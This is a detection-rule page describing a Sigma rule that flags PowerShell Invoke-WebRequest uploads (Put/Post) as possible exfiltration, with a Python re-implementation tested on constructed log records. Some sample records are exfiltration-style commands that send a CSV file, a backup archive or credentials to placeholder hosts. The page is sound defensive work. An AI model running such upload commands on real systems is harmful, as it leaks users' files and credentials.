
PowerShell Script With File Upload Capabilities

Sigma Rules

Summary
This rule aims to identify potentially malicious PowerShell scripts that use the `Invoke-WebRequest` cmdlet to upload files to remote servers. The presence of the `-Method Put` or `-Method Post` flags in the script signifies that data could be exfiltrated by submitting it to an external server. This detection targets scripts that leverage the web request methods typically used to upload data. The rule analyzes the `ScriptBlockText` for this cmdlet together with the specific flags indicative of upload activity, a combination that can indicate a data leak or breach in progress. By monitoring these patterns, organizations can reduce the risk of sensitive data being exfiltrated undetected.
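As an added example that is not part of this rule or its source, the following Python re-implements the matching logic described above over constructed script block log records (matching is case-insensitive, as Sigma string matching is); the `Invoke-RestMethod` record is included only to show that it falls outside the rule as described, so a defender wanting that coverage would extend the cmdlet list.

```python
"""Re-implementation of the described detection over constructed ScriptBlockText records."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Sigma string matching and PowerShell cmdlet/parameter names are case-insensitive.
CMDLET_RE = re.compile(r"\bInvoke-WebRequest\b", re.IGNORECASE)
# -Method followed by Put or Post; PowerShell accepts a space or a colon as separator.
UPLOAD_METHOD_RE = re.compile(r"-Method[\s:]+(Put|Post)\b", re.IGNORECASE)


@dataclass
class Alert:
    record_id: int
    method: str      # normalised to "Put" or "Post"
    evidence: str    # the script line that carried the upload method


def matches_upload_rule(script_block_text: str) -> Optional[str]:
    """Return 'Put'/'Post' when the block uses Invoke-WebRequest with an upload method, else None."""
    if not CMDLET_RE.search(script_block_text):
        return None
    m = UPLOAD_METHOD_RE.search(script_block_text)
    return m.group(1).capitalize() if m else None


def scan(records: Iterable[Dict[str, object]]) -> List[Alert]:
    """Apply the rule to each record and collect alerts with analyst-facing evidence."""
    alerts: List[Alert] = []
    for rec in records:
        text = str(rec["ScriptBlockText"])
        method = matches_upload_rule(text)
        if method is None:
            continue
        evidence = next(line.strip() for line in text.splitlines() if UPLOAD_METHOD_RE.search(line))
        alerts.append(Alert(int(rec["RecordId"]), method, evidence))
    return alerts


# Constructed sample records shaped like PowerShell script block logging output (not real telemetry).
SAMPLE_RECORDS = [
    {"RecordId": 1, "ScriptBlockText": "Invoke-WebRequest -Uri https://updates.example.invalid/feed.xml -OutFile C:\\Temp\\feed.xml"},
    {"RecordId": 2, "ScriptBlockText": "$body = Get-Content -Raw C:\\Users\\Public\\export.csv\ninvoke-webrequest -Uri https://upload.example.invalid/drop -method post -Body $body"},
    {"RecordId": 3, "ScriptBlockText": "Invoke-WebRequest -Method Put -Uri https://files.example.invalid/backup.zip -InFile .\\backup.zip"},
    {"RecordId": 4, "ScriptBlockText": "Invoke-RestMethod -Method Post -Uri https://api.example.invalid/login -Body $creds"},
    {"RecordId": 5, "ScriptBlockText": "Invoke-WebRequest -Uri https://example.invalid -Method Get"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(f"record {alert.record_id}: {alert.method} upload -> {alert.evidence}")
```

Only records 2 and 3 fire: record 1 is a download, record 5 uses `Get`, and record 4 uses a cmdlet the rule does not cover.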
Categories
  • Windows
  • Endpoint
Data Sources
  • Script
  • Process
ATT&CK Techniques
  • T1020
Created: 2022-01-07